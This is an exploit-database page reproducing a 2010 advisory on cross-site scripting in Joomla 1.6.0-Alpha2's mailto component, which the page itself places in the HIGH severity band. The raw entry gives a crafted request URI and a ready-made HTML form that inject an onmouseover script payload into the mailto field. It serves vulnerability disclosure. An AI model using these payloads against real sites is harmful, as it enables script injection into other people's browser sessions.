header-logo
Suggest Exploit
vendor:
Joomla
by:
mega-itec.com
8,8
CVSS
HIGH
XSS (POST) mailto,subject,from,sender
79
CWE
Product Name: Joomla
Affected Version From: 1.6.0-Alpha2
Affected Version To: 1.6.0-Alpha2
Patch Exists: No
Related CWE: N/A
CPE: a:joomla:joomla:1.6.0-alpha2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: [relevant os]
2010

Joomla_1.6.0-Alpha2 XSS Vulnerabilities

A vulnerability exists in Joomla 1.6.0-Alpha2 which allows an attacker to inject malicious JavaScript code into the mailto, subject, from, and sender fields of the mailto component. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site when the malicious link is clicked.

Mitigation:

Ensure that user input is properly validated and filtered before being used in the application.
Source

Exploit-DB raw data:

# Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities 
# Date: 2010-05-02
# Author: mega-itec.com
# Software Link:
http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip
# Version: 1.6.0-alpha2
# Tested on: [relevant os]
# CVE : 
# Code : 
[:::::::::::::::::::::::::::::::::::::: 0x1
::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities 
Author = mega-itec security team
Contact = securite@mega-itec.com 
 
[:::::::::::::::::::::::::::::::::::::: 0x2
::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = Joomla
Vendor = Joomla
Vendor Website = http://www.joomla.org/
Affected Version(s) = 1.6.0-Alpha2
 
  
[:::::::::::::::::::::::::::::::::::::: 0x3
::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = XSS ( POST ) mailto,subject,from,sender 
Example URI = 
option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode
link with base 64
 
>> #2 html code exploit : 
<form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php"
name="mailtoForm" method="post">

<div style="padding: 10px;">
	<div style="text-align:right">
		<a href="javascript: void window.close()">
			Close Window <img
src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png"
border="0" alt="" title="" /></a>
	</div>

	<h2>
		E-mail this link to a friend.	</h2>

	<p>
		E-mail to:
		<br />
		<input type="text" name="mailto" class="inputbox" size="25" value="&#65533;"
onmouseover=prompt(406426661849)//"/>
	</p>

	<p>
		Sender:
		<br />
		<input type="text" name="sender" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		Your E-mail:
		<br />
		<input type="text" name="from" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		Subject:
		<br />
		<input type="text" name="subject" class="inputbox"
value="mega-itec@mega-ite.com" size="25" />
	</p>

	<p>
		<button class="button" onclick="return submitbutton('send');">
			Send		</button>
		<button class="button" onclick="window.close();return false;">
			Cancel		</button>
	</p>
</div>

	<input type="hidden" name="layout" value="default" />
	<input type="hidden" name="option" value="com_mailto" />
	<input type="hidden" name="task" value="send" />
	<input type="hidden" name="tmpl" value="component" />
	<input type="hidden" name="link" value="encode you link with base64" />
	<input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1"
/></form>
 
 
[:::::::::::::::::::::::::::::::::::::: 0x4
::::::::::::::::::::::::::::::::::::::]
>> Misc
mega-itec.com ::: mega-itec security team 
 
 
[:::::::::::::::::::::::::::::::::::::: EOF
::::::::::::::::::::::::::::::::::::::]

Navigation

Suggest Exploit

Services By CQR